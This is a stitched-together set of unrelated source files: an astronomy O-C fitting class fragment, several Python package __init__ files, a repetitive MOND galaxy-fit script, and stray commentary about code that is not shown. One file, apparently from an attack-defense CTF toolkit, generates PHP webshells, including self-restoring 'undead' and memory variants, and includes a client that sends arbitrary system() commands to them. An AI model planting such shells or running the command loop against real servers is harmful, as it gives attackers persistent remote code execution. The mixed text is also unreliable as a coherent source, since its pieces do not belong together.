fmt=["%14.7f",'%10.3f',"%+12.10f"],delimiter=" ",
header='Obs. Time'.ljust(14,' ')+' '+'Epoch'.ljust(10,' ')
+' new O-C')
f.close()
self.epoch=old_epoch
class OCFitLoad(OCFit):
'''loading saved data, model... from OCFit class'''
def __init__(self,path):
'''loading data, model, parameters... from file'''
self._order=[]
self.t=[] #times
self.oc=[] #O-Cs
self.err=[] #errors
self._set_err=False
self.limits={} #limits of parameters for fitting
        self.steps={} #steps (width of normal distribution) of parameters for fitting
self.params={} #values of parameters, fixed values have to be set here
self.params_err={} #errors of fitted parameters
self.paramsMore={} #values of parameters calculated from model params
self.paramsMore_err={} #errors of calculated parameters
self.fit_params=[] #list of fitted parameters
self._calc_err=False #errors were calculated
self._corr_err=False #errors were corrected
self._old_err=[] #given errors
self.model='LiTE3' #used model of O-C
self._t0P=[] #linear ephemeris of binary
self.epoch=[] #epoch of binary
        self.res=[] #residuals = new O-C
self._min_type=[] #type of minima (primary=0 / secondary=1)
self.availableModels=['LiTE3','LiTE34','LiTE3Quad','LiTE34Quad',\
'AgolInPlanet','AgolInPlanetLin','AgolExPlanet',\
'AgolExPlanetLin','Apsidal'] #list of available models
self.Load(path)
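The weight handling in Plot() above maps arbitrary weights linearly onto the interval (1, 10) before bucketing them into marker sizes. A standalone sketch of that rescaling (the function name is illustrative and not part of the class):

```python
import numpy as np

def rescale_weights(weight):
    # Linear map of weights onto (1, 10), as Plot() does when
    # trans_weight is True: 9/(w_max-w_min)*(w-w_min)+1.
    weight = np.asarray(weight, dtype=float)
    w_min, w_max = weight.min(), weight.max()
    return 9. / (w_max - w_min) * (weight - w_min) + 1.
```

The minimum weight maps to 1 and the maximum to 10, so the level boundaries [0,3,5,7.9,10] used for marker sizes always cover the data.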
# --- dense/fc_densenet/__init__.py (repo: ibrahimgh25/EL-GAN-Implementation, license: MIT) ---
from .fc_densenet import FCDenseNet
from .transition_up import TransitionUp, CenterCropConcat
from .transition_down import TransitionDown
# --- autorch/transferlearning/__init__.py (repo: skywalker0803r/autorch, license: MIT) ---
from .wadda import WADDA
# --- detector/__init__.py (repo: TropComplique/single-shot-detector, license: MIT) ---
from .ssd import SSD
# --- vega/modules/arch/__init__.py (repo: jie311/vega, license: MIT) ---
from .architecture import transform_architecture
from .combiner import ConnectionsArchParamsCombiner
from .prune_arch import Conv2dPruneArchitecture, BatchNorm2dPruneArchitecture
from .double_channels_arch import Conv2dDoubleChannelArchitecture, BatchNorm2dDoubleChannelArchitecture
# --- awdphpspear/shell.py (repo: hillmanyoung/AWD, license: MIT) ---
import requests
import os
def shell_gen():
choose = raw_input('[+]1.Normal Shell.2.Undead Shell.3.Memory Shell.')
if choose == '1':
try:
payload = '<?php '
payload += '@eval($_POST[a]);@system($_POST[b]);'
payload += '?>'
file = open('shell.php',"a")
file.write(payload)
file.close()
print "[+]Succeed."
except:
print "[-]Failed."
if choose == '2':
try:
payload = '<?php '
payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);$file='
payload += "'"
payload += "shell.php"
payload += "'"
payload += ';$code='
payload += "'"
payload += '<?php @eval($_POST[a]);@system($_POST[b]); ?>'
payload += "'"
payload += ';while(1){file_put_contents($file,$code);usleep(5000);}'
payload += '?>'
file = open('shell.php',"a")
file.write(payload)
file.close()
print "[+]Succeed."
except:
print "[-]Failed."
if choose == '3':
try:
payload = '<?php '
payload += 'ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);'
            payload += 'while(1){@eval($_POST[a]);@system($_POST[b]);usleep(5000);}'
payload += '?>'
file = open('shell.php',"a")
file.write(payload)
file.close()
print "[+]Succeed."
except:
print "[-]Failed."
def rce(address,password,method):
while 1:
command = raw_input('Command(Input stop to exit):')
if command == 'stop':
break
if method == 'get':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.get(address,params=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
print "*******************************************************"
if method == 'post':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.post(address,data=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
print "*******************************************************"
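The GET and POST branches of rce() above (and of batch_rce() below) differ only in which requests call they make; the command payload they send is identical. An illustrative helper (hypothetical name, not used by this module) that captures that shared piece:

```python
def build_payload(password, command):
    # PHP one-liner executed by the webshell: system('<command>');
    # keyed by the shell password parameter.
    return {password: "system('" + command + "');"}
```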
def batch_rce(address,password,method,command):
if method == 'get':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.get(address,params=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
print "*******************************************************"
if method == 'post':
print "*******************************************************"
try:
data = {password:"system('"+command+"');"}
r = requests.post(address,data=data)
if r.text != '':
print address,":"
print r.text
print "*******************************************************"
except:
print "[-]Rce Failed."
            print "*******************************************************"
# --- src/coalescenceml/integrations/xgboost/producers/__init__.py (repo: bayoumi17m/CoalescenceML, license: Apache-2.0) ---
from coalescenceml.integrations.xgboost.producers.xgboost_booster_producer import (
XgboostBoosterProducer,
)
from coalescenceml.integrations.xgboost.producers.xgboost_dmatrix_producer import (
XgboostDMatrixProducer,
)
# --- MOND_Python_getDist_levels_5th_30gal_run2.py (repo: alefefreire/Machine-Learning-for-Science, license: MIT) ---
from __future__ import print_function
import numpy
import pandas as pd
import csv
import matplotlib.pyplot as plot
from matplotlib.ticker import MaxNLocator
from scipy.interpolate import interp1d
import scipy.optimize as op
import scipy
from scipy import *
from scipy.special import expi
#import lmfit
#from lmfit import minimize, Minimizer, Parameters, Parameter, report_fit
#import emcee
#from emcee import PTSampler
from matplotlib import rcParams
import time
from scipy.interpolate import InterpolatedUnivariateSpline
import sys
sys.path.insert(0,r'c:\work\dist\git\getdist')
import getdist
from getdist import plots, MCSamples
#import getdist, IPython
import pylab as plt
print('GetDist Version: %s, Matplotlib version: %s'%(getdist.__version__, plt.matplotlib.__version__))
#matplotlib 2 doesn't seem to work well without usetex on
plt.rcParams['text.usetex']=True
labels=[r"$\log_{10} a_0$",r"$\log_{10}\Upsilon_{*d}$",r"$\delta$", r"$\Delta i$"]
labels_with_bulge=[r"$\log_{10} a_0$",r"$\log_{10}\Upsilon_{*d}$",r"$\log_{10}\Upsilon_{*b}$",r"$\delta$", r"$\Delta i$"]
names=["log10_a0","log10_YD","df2","Dinc"]
names_with_bulge=["log10_a0","log10_YD","log10_YB","df2","Dinc"]
ndim=len(labels)
ndim_with_bulge=len(labels_with_bulge)
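The contour values passed to updateSettings() for every galaxy below are the two-sided Gaussian probabilities for 1 to 5 sigma. They need not be hard-coded; a sketch regenerating them from the standard library:

```python
from math import erf

# P(|x| < n*sigma) for a Gaussian, n = 1..5:
# 0.6826894..., 0.9544997..., 0.9973002..., 0.9999366..., 0.9999994...
sigma_levels = [erf(n / 2.0**0.5) for n in range(1, 6)]
```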
full_chain_UGC06930 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC06930.csv',usecols=[1,2,3,4])
data_array_chain_UGC06930 = numpy.array(full_chain_UGC06930)
mle_soln_UGC06930=[]
for i in range(ndim):
mcmc_UGC06930 = numpy.percentile(data_array_chain_UGC06930[:, i], [16, 50, 84])
q_UGC06930 = numpy.diff(mcmc_UGC06930)
mle_soln_UGC06930.append(mcmc_UGC06930[1])
log10_a0_sol_UGC06930=mle_soln_UGC06930[0]
log10_YD_sol_UGC06930=mle_soln_UGC06930[1]
df2_sol_UGC06930=mle_soln_UGC06930[2]
Dinc_sol_UGC06930=mle_soln_UGC06930[3]
samp_UGC06930 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC06930,names = names, labels = labels)
samp_UGC06930.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC06930 = samp_UGC06930.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC06930
low=log10_a0_sol_UGC06930-stats_UGC06930.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC06930
low=log10_YD_sol_UGC06930-stats_UGC06930.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC06930
low=df2_sol_UGC06930-stats_UGC06930.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('df2').limits[i].upper- df2_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC06930
low=Dinc_sol_UGC06930-stats_UGC06930.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC06930.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC06930
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06930-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
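Each "sigmatab" file written above holds the same three numbers per row: the best-fit value, its distance to the lower confidence limit, and its distance to the upper limit, for the 1-5 sigma levels. An illustrative helper (hypothetical, not used by this script) producing one such row:

```python
def sigma_row(sol, lower, upper):
    # Returns one "max,s-,s+" row of a sigmatab file, where lower/upper
    # are the confidence-limit bounds for a single sigma level.
    return '%s,%s,%s' % (sol, sol - lower, upper - sol)
```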
full_chain_UGC06983 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC06983.csv',usecols=[1,2,3,4])
data_array_chain_UGC06983 = numpy.array(full_chain_UGC06983)
mle_soln_UGC06983=[]
for i in range(ndim):
mcmc_UGC06983 = numpy.percentile(data_array_chain_UGC06983[:, i], [16, 50, 84])
q_UGC06983 = numpy.diff(mcmc_UGC06983)
mle_soln_UGC06983.append(mcmc_UGC06983[1])
log10_a0_sol_UGC06983=mle_soln_UGC06983[0]
log10_YD_sol_UGC06983=mle_soln_UGC06983[1]
df2_sol_UGC06983=mle_soln_UGC06983[2]
Dinc_sol_UGC06983=mle_soln_UGC06983[3]
samp_UGC06983 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC06983,names = names, labels = labels)
samp_UGC06983.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC06983 = samp_UGC06983.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC06983
low=log10_a0_sol_UGC06983-stats_UGC06983.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC06983
low=log10_YD_sol_UGC06983-stats_UGC06983.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC06983
low=df2_sol_UGC06983-stats_UGC06983.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('df2').limits[i].upper- df2_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC06983
low=Dinc_sol_UGC06983-stats_UGC06983.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC06983.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC06983
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC06983-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07089 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07089.csv',usecols=[1,2,3,4])
data_array_chain_UGC07089 = numpy.array(full_chain_UGC07089)
mle_soln_UGC07089=[]
for i in range(ndim):
mcmc_UGC07089 = numpy.percentile(data_array_chain_UGC07089[:, i], [16, 50, 84])
q_UGC07089 = numpy.diff(mcmc_UGC07089)
mle_soln_UGC07089.append(mcmc_UGC07089[1])
log10_a0_sol_UGC07089=mle_soln_UGC07089[0]
log10_YD_sol_UGC07089=mle_soln_UGC07089[1]
df2_sol_UGC07089=mle_soln_UGC07089[2]
Dinc_sol_UGC07089=mle_soln_UGC07089[3]
samp_UGC07089 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07089,names = names, labels = labels)
samp_UGC07089.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07089 = samp_UGC07089.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07089
low=log10_a0_sol_UGC07089-stats_UGC07089.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07089
low=log10_YD_sol_UGC07089-stats_UGC07089.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07089
low=df2_sol_UGC07089-stats_UGC07089.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('df2').limits[i].upper- df2_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07089
low=Dinc_sol_UGC07089-stats_UGC07089.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07089.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07089
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07089-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07125 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07125.csv',usecols=[1,2,3,4])
data_array_chain_UGC07125 = numpy.array(full_chain_UGC07125)
mle_soln_UGC07125=[]
for i in range(ndim):
mcmc_UGC07125 = numpy.percentile(data_array_chain_UGC07125[:, i], [16, 50, 84])
q_UGC07125 = numpy.diff(mcmc_UGC07125)
mle_soln_UGC07125.append(mcmc_UGC07125[1])
log10_a0_sol_UGC07125=mle_soln_UGC07125[0]
log10_YD_sol_UGC07125=mle_soln_UGC07125[1]
df2_sol_UGC07125=mle_soln_UGC07125[2]
Dinc_sol_UGC07125=mle_soln_UGC07125[3]
samp_UGC07125 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07125,names = names, labels = labels)
samp_UGC07125.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC07125 = samp_UGC07125.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC07125
low=log10_a0_sol_UGC07125-stats_UGC07125.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC07125
low=log10_YD_sol_UGC07125-stats_UGC07125.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC07125
low=df2_sol_UGC07125-stats_UGC07125.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('df2').limits[i].upper- df2_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC07125
low=Dinc_sol_UGC07125-stats_UGC07125.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC07125.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC07125
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07125-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC07151 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07151.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07151 = numpy.array(full_chain_UGC07151)
mle_soln_UGC07151 = []
for i in range(ndim):
    mcmc_UGC07151 = numpy.percentile(data_array_chain_UGC07151[:, i], [16, 50, 84])
    q_UGC07151 = numpy.diff(mcmc_UGC07151)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07151.append(mcmc_UGC07151[1])  # marginalized median of parameter i
log10_a0_sol_UGC07151 = mle_soln_UGC07151[0]
log10_YD_sol_UGC07151 = mle_soln_UGC07151[1]
df2_sol_UGC07151 = mle_soln_UGC07151[2]
Dinc_sol_UGC07151 = mle_soln_UGC07151[3]
samp_UGC07151 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07151, names=names, labels=labels)
samp_UGC07151.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07151 = samp_UGC07151.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07151), ('log10_YD', log10_YD_sol_UGC07151), ('df2', df2_sol_UGC07151), ('Dinc', Dinc_sol_UGC07151)):
    limits = stats_UGC07151.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07151-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07232 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07232.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07232 = numpy.array(full_chain_UGC07232)
mle_soln_UGC07232 = []
for i in range(ndim):
    mcmc_UGC07232 = numpy.percentile(data_array_chain_UGC07232[:, i], [16, 50, 84])
    q_UGC07232 = numpy.diff(mcmc_UGC07232)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07232.append(mcmc_UGC07232[1])  # marginalized median of parameter i
log10_a0_sol_UGC07232 = mle_soln_UGC07232[0]
log10_YD_sol_UGC07232 = mle_soln_UGC07232[1]
df2_sol_UGC07232 = mle_soln_UGC07232[2]
Dinc_sol_UGC07232 = mle_soln_UGC07232[3]
samp_UGC07232 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07232, names=names, labels=labels)
samp_UGC07232.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07232 = samp_UGC07232.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07232), ('log10_YD', log10_YD_sol_UGC07232), ('df2', df2_sol_UGC07232), ('Dinc', Dinc_sol_UGC07232)):
    limits = stats_UGC07232.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07232-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07261 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07261.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07261 = numpy.array(full_chain_UGC07261)
mle_soln_UGC07261 = []
for i in range(ndim):
    mcmc_UGC07261 = numpy.percentile(data_array_chain_UGC07261[:, i], [16, 50, 84])
    q_UGC07261 = numpy.diff(mcmc_UGC07261)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07261.append(mcmc_UGC07261[1])  # marginalized median of parameter i
log10_a0_sol_UGC07261 = mle_soln_UGC07261[0]
log10_YD_sol_UGC07261 = mle_soln_UGC07261[1]
df2_sol_UGC07261 = mle_soln_UGC07261[2]
Dinc_sol_UGC07261 = mle_soln_UGC07261[3]
samp_UGC07261 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07261, names=names, labels=labels)
samp_UGC07261.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07261 = samp_UGC07261.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07261), ('log10_YD', log10_YD_sol_UGC07261), ('df2', df2_sol_UGC07261), ('Dinc', Dinc_sol_UGC07261)):
    limits = stats_UGC07261.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07261-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07323 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07323.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07323 = numpy.array(full_chain_UGC07323)
mle_soln_UGC07323 = []
for i in range(ndim):
    mcmc_UGC07323 = numpy.percentile(data_array_chain_UGC07323[:, i], [16, 50, 84])
    q_UGC07323 = numpy.diff(mcmc_UGC07323)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07323.append(mcmc_UGC07323[1])  # marginalized median of parameter i
log10_a0_sol_UGC07323 = mle_soln_UGC07323[0]
log10_YD_sol_UGC07323 = mle_soln_UGC07323[1]
df2_sol_UGC07323 = mle_soln_UGC07323[2]
Dinc_sol_UGC07323 = mle_soln_UGC07323[3]
samp_UGC07323 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07323, names=names, labels=labels)
samp_UGC07323.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07323 = samp_UGC07323.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
for par, sol in (('log10_a0', log10_a0_sol_UGC07323), ('log10_YD', log10_YD_sol_UGC07323), ('df2', df2_sol_UGC07323), ('Dinc', Dinc_sol_UGC07323)):
    limits = stats_UGC07323.parWithName(par).limits
    with open('/home/alefe/Cluster/MOND_GetDist_corner/UGC07323-sigmatab-%s.txt' % par, 'w') as text_file:
        text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
        for i in range(5):
            text_file.write('%s,%s,%s\n' % (sol, sol - limits[i].lower, limits[i].upper - sol))
full_chain_UGC07399 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC07399.csv', usecols=[1, 2, 3, 4])
data_array_chain_UGC07399 = numpy.array(full_chain_UGC07399)
mle_soln_UGC07399 = []
for i in range(ndim):
    mcmc_UGC07399 = numpy.percentile(data_array_chain_UGC07399[:, i], [16, 50, 84])
    q_UGC07399 = numpy.diff(mcmc_UGC07399)  # 16-50 and 50-84 spreads (unused below)
    mle_soln_UGC07399.append(mcmc_UGC07399[1])  # marginalized median of parameter i
log10_a0_sol_UGC07399 = mle_soln_UGC07399[0]
log10_YD_sol_UGC07399 = mle_soln_UGC07399[1]
df2_sol_UGC07399 = mle_soln_UGC07399[2]
Dinc_sol_UGC07399 = mle_soln_UGC07399[3]
samp_UGC07399 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC07399, names=names, labels=labels)
samp_UGC07399.updateSettings({'contours': [0.682689492137086, 0.954499736103642, 0.997300203936740, 0.999936657516334, 0.999999426696856]})
stats_UGC07399 = samp_UGC07399.getMargeStats()
# One sigma-table file per parameter; rows give the 1-5 sigma offsets below/above the median.
